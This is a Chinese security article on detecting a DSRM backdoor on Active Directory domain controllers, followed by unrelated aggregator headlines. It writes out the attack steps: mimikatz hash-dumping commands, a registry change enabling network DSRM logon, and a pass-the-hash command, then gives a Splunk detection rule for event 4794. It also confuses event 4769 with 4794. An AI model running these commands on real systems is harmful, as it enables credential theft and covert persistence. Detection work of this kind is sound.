基于AD Event日志实时检测DSRM后门
01、简介
每个域控制器都有一个目录还原模式(DSRM)帐户,它的密码是在安装域控时设置的,实际上它对应的就是sam文件里的本地管理员“administrator”,基本很少会被重置,因此有着极强的隐蔽性。攻击者通过获取域控的DSRM密码,就可以使用帐户通过网络登录到域控服务器,从而达到权限维持的目的。
域内权限维持的方式有很多,每增加一条安全检测规则,就多一层安全保障。针对DSRM后门,基于AD Event日志能够帮助我们提供什么维度的检测,我们通过一个后门利用实例来看一下。
(资料图)
02、利用方式
(1)获取域内用户Hash
使用mimikatz查看域内用户test的NTLM Hash。
mimikatz # privilege::debugmimikatz # lsadump::lsa /patch /name:test
(2)将DSRM帐户和域用户的NTLM Hash同步
使用DSRM的密码和指定域用户test的密码进行同步,在命令行环境中使用ntdsutil工具重置DSRM管理员密码。
(3)抓取DSRM密码
因同步域内用户test的NTLM Hash,可以发现,DSRM Hash 和域用户test的NTLM Hash一致。
mimikatz#privilege::debugmimikatz # token::elevatemimikatz # lsadump::sam
(4)修改DSRM登录方式
DSRM 有三种登录方式,具体如下:
0:默认值,只有当域控制器重启并进入 DSRM 模式时,才可以使用 DSRM 管理员账号1:只有当本地 AD、DS 服务停止时,才可以使用 DSRM 管理员账号登录域控制器2:在任何情况下,都可以使用 DSRM 管理员账号登录域控制器
如果要使用 DSRM 账号通过网络登录域控制器,需要将该值设置为 2。
修改注册表:
reg add "HKLM\System\CurrentControlSet\Control\Lsa" /f /v DsrmAdminLogonBehavior /t REG_DWORD /d 2
(5)使用DSRM远程登录
在域成员服务器上使用DSRM进行远程登录,注意domain使用域控的主机名。
mimikatz # privilege::debugmimikatz # sekurlsa::pth /user:administrator /domain:win-dc01 /ntlm:44f077e27f6fef69e7bd834c7242b040
03、攻击检测
当攻击者尝试重置DSRM管理员密码或是指定域内用户NTLM Hash同步时,都会生成4769事件,因此可以实时监控4794事件,一旦攻击者尝试修改DSRM密码就会触发告警。
4794事件:每次更改目录还原模式(DSRM)管理员密码时,就会生成此事件,包含SID和帐户名,以及调用方工作站。
安全规则:
index=ad EventCode=4794 | stats count earliest(_time) AS start_time latest(_time) AS end_time by dest user| eval start_time=strftime(start_time,"%Y-%m-%d %H:%M:%S")| eval end_time=strftime(end_time,"%Y-%m-%d %H:%M:%S") | eval message="在"+start_time+"到"+end_time+"时间内,域控服务器:"+dest +" 疑似DSRM域后门行为,试图设置目录服务还原模式管理员密码"+count+"次,操作账号:"+user| table start_time end_time user message
安全告警效果如下图:
-
基于AD Event日志实时检测DSRM后门
程序员客栈 2023-01-12
-
什么值得买发布2023《年货趋势报告》:吃喝玩用全面升级,健康消费成关键词
中国网 2023-01-11
-
天天滚动:价差1500区别有多大?9款游戏电竞耳机横评丨凰家评测
凤凰网 2023-01-11
-
环球关注:文化和旅游部2023年新春旅游推广活动将办
中国文化报 2023-01-11
-
核污染防治板块1月10日跌0.43%,*ST海伦领跌,主力资金净流出5525.3万元-世界最资讯
证券之星 2023-01-11
-
万和电气营收下滑、重销售轻研发,间接控股股东再抛大额减持计划
时代数据Datagoo 2023-01-10
-
1月10日东北地区乙醇市场行情弱势运行|热消息
生意社 2023-01-10
-
*ST皇台(000995)1月10日主力资金净买入362.91万元
证券之星 2023-01-10
-
宇顺电子(002289)1月9日主力资金净卖出1655.25万元:每日简讯
证券之星 2023-01-10
-
信用卡冻结了还不上钱怎么办? 环球快讯
法师兄 2023-01-10
-
基于AD Event日志实时检测DSRM后门
程序员客栈 2023-01-12
-
什么值得买发布2023《年货趋势报告》:吃喝玩用全面升级,健康消费成关键词
中国网 2023-01-11
-
天天滚动:价差1500区别有多大?9款游戏电竞耳机横评丨凰家评测
凤凰网 2023-01-11
-
环球关注:文化和旅游部2023年新春旅游推广活动将办
中国文化报 2023-01-11
-
核污染防治板块1月10日跌0.43%,*ST海伦领跌,主力资金净流出5525.3万元-世界最资讯
证券之星 2023-01-11
-
万和电气营收下滑、重销售轻研发,间接控股股东再抛大额减持计划
时代数据Datagoo 2023-01-10
-
1月10日东北地区乙醇市场行情弱势运行|热消息
生意社 2023-01-10
-
*ST皇台(000995)1月10日主力资金净买入362.91万元
证券之星 2023-01-10
-
宇顺电子(002289)1月9日主力资金净卖出1655.25万元:每日简讯
证券之星 2023-01-10
-
信用卡冻结了还不上钱怎么办? 环球快讯
法师兄 2023-01-10
-
富宝贷逾期七天多久会上征信系统_环球动态
法师兄 2023-01-10
-
滴水贷12期逾期三个月不还会上征信吗_当前讯息
法师兄 2023-01-10
-
平安新一贷贷款逾期六天拖欠多久会上征信系统 速读
法师兄 2023-01-10
-
大连路控江路人行天桥有电梯了
新民晚报 2023-01-09
-
科尔:伊戈达拉有着惊人的体能和极高的球商 明天有时间限制!
直播吧 2023-01-09
-
工作流引擎架构设计-全球即时看
程序员客栈 2023-01-09
-
天天观焦点:魅族20入网,使用4700毫安电池和80瓦的快充
自黑科技 2023-01-09
-
世界最资讯丨苏宁任性贷借款逾期一个月拖欠多久会上征信系统
2023-01-09
-
热资讯!居民消费热情正在回归 出行、线下消费等逐步增多
2023-01-09
-
2023年才过去5天!又一位知名大咖不幸病逝,赵雅芝、周传雄悼念
2023-01-07
-
一颗“中国心”至少70万,谁来拯救消失的心跳?
2023-01-06
-
信阳建投投资集团:20.00亿元中期票据获准注册_时快讯
2023-01-06
-
环球速看:2023南京高铁儿童票购票标准
2023-01-06
-
每日快播:凯龙高科(300912.SZ):发动机尾气后处理系统扩能项目延期
2023-01-05
-
全球关注:新西兰:对中国旅客实施入境限制“没有必要”
2023-01-05
-
世界热讯:销售新规实施一年半,理财产品业绩展示仍五花八门 整改规范再推进
2023-01-05
-
【天天速看料】青海多部门合力提升外来入侵物种治理效能 推动生物安全法治建设
2023-01-04
-
京东方精电(00710.HK)因购股权获行使发行11.5万股
2023-01-04